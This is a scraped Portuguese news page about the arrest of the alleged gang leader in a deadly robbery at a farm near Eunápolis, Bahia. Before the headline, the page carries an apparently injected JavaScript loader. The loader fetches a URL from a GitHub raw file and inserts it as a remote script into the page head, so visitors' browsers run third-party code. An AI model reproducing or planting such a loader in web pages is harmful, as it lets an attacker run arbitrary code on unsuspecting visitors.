;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Preso último acusado de participação no roubo que resultou três mortos em fazenda – O Povo News

O Povo News

Preso último acusado de participação no roubo que resultou três mortos em fazenda

Foi preso na manhã do último sábado (18), no estado do Espírito Santo, o último homem acusado de participação no assalto que resultou em duas pessoas da mesma família mortas e outra gravemente ferida, em uma fazenda na região da Embaúba, entre os municípios de Eunápolis e Santa Cruz Cabrália. Os outros dois envolviodos no crime, segundo a polícia, já tinha sido morto.

Apontado pelas investigações como líder da quadrilha, Edjúnior Amorim Dias, 28 anos, o Galego, foi localizado pela Polícia Civil na cidade de Anchieta, no litoral capixaba.

Durante o cumprimento do mandado de prisão, que contou com o apoio da polícia capixaba, Edjúnior Amorim foi flagrado com um revólver calibre 38 e duas porções de maconha. Ele foi recambiado para a carceragem da 23ª Coorpin, em Eunápolis, no mesmo dia.

EdJúnior era irmão de Emanuel Amorim dos Santos, 22 anos, o Téo, que foi baleado por uma das vítimas do roubo e morreu em menos de 48 horas no Hospital Regional .

O terceiro suspeito, Mário Amorim do Carmo, mais conhecido como Tatá, foi morto 50 dias depois, em uma ação da Polícia Militar na Estrada do Queimado, em Itabela . Ele também estava com prisão preventiva decretada pela justiça.

Segundo o delegado Moisés Damasceno, a quadrilha vinha praticando diversos crimes contra o patrimônio na zona rural dos municípios de Eunápolis, Santa Cruz Cabrália e Porto Seguro, com atuação, principalmente, no Projeto Maravilha I, Projeto Maravilha II, Projeto Santa Maria e Projeto Embaúba .

O LATROCÍNIO

Na noite de 2 de julho deste ano, durante um assalto a uma fazenda na região do Projeto Embaúba, uma quadrilha matou dois homens e uma mulher gravemente ferida . Todos eram da mesma família. Uma vítima reagiu e atirou em um dos bandidos , que morreu dois dias depois no Hospital Regional.

Fonte: Radar64

Compartilhe nas redes sociais:

Leia mais

20241009_090115
20241010_093532
o-tempo-no-brasil-na-semana-chuvas-se-espalham-pelo-pais-com-alertas-tempo-severo-no-sul-sudeste-e-no-centro-oeste-1728246745788_512
OIP (1)
page
Imagem do WhatsApp de 2024-10-09 à(s) 16.39
OIP
turismo-na-bahia-melhores-lugares-para-viajar
baixados (17)
Imagem do WhatsApp de 2024-10-08 à(s) 19.09
loja-correios
Capturar